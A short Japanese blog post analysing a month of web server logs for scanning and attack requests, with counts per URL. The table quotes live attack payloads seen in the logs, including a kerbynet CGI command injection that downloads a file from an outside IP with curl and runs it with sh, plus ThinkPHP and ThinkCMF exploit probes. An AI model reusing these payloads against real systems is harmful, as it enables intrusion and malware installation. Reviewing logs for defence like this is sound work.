3月のwebサーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
PHPUnitの脆弱性CVE-2017-9841のスキャン通信
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
3月のログでは一番多かったです。
最近流行っているみたいです。
CVE-2017-9841を悪用したスキャン通信の増加 – wizSafe Security Signal -安心・安全への道標- IIJ
thinkPHPの脆弱性を利用した攻撃
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
意図不明
/config/getuser?index=0
それらしい脆弱性は見当たりませんでしたが、100回以上同じリクエストがありました。
WordPressの脆弱性を利用した攻撃
/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
あまり詳細はわからなかったのですが、WordPressの脆弱性らしいです。
同じIPから複数のWordPressとPHP関連のスキャンが来ていました。
不審な通信の一覧
url | count |
---|---|
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 248 |
/sellers.json | 183 |
/wp-login.php | 182 |
/.env | 167 |
/_ignition/execute-solution | 151 |
/config/getuser?index=0 | 115 |
/index.php | 113 |
/wp-content/plugins/wp-file-manager/readme.txt | 110 |
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | 108 |
/api/jsonws/invoke | 108 |
/console/ | 107 |
/Autodiscover/Autodiscover.xml | 107 |
/manager/html | 89 |
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | 87 |
/solr/admin/info/system?wt=json | 72 |
/index.xml | 67 |
/login | 57 |
/jenkins/login | 50 |
mstshash=Administr | 44 |
/?a=fetch&content=die(@md5(HelloThinkCMF)) | 38 |
/mifs/.;/services/LogService | 36 |
/?XDEBUG_SESSION_START=phpstorm | 36 |
/system_api.php | 32 |
/wp/wp-login.php | 26 |
/wordpress/wp-login.php | 26 |
/blog/wp-login.php | 26 |
/dns-query?dns=AAABAAABAAAAAAAAA3d3dwViYWlkdQNjb20AAAEAAQ | 25 |
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f | 23 |
/boaform/admin/formLogin | 23 |
/test.php | 22 |
/actuator/health | 22 |
/0bef | 22 |
参考
CVE-2017-9841を悪用したスキャン通信の増加 – wizSafe Security Signal -安心・安全への道標- IIJ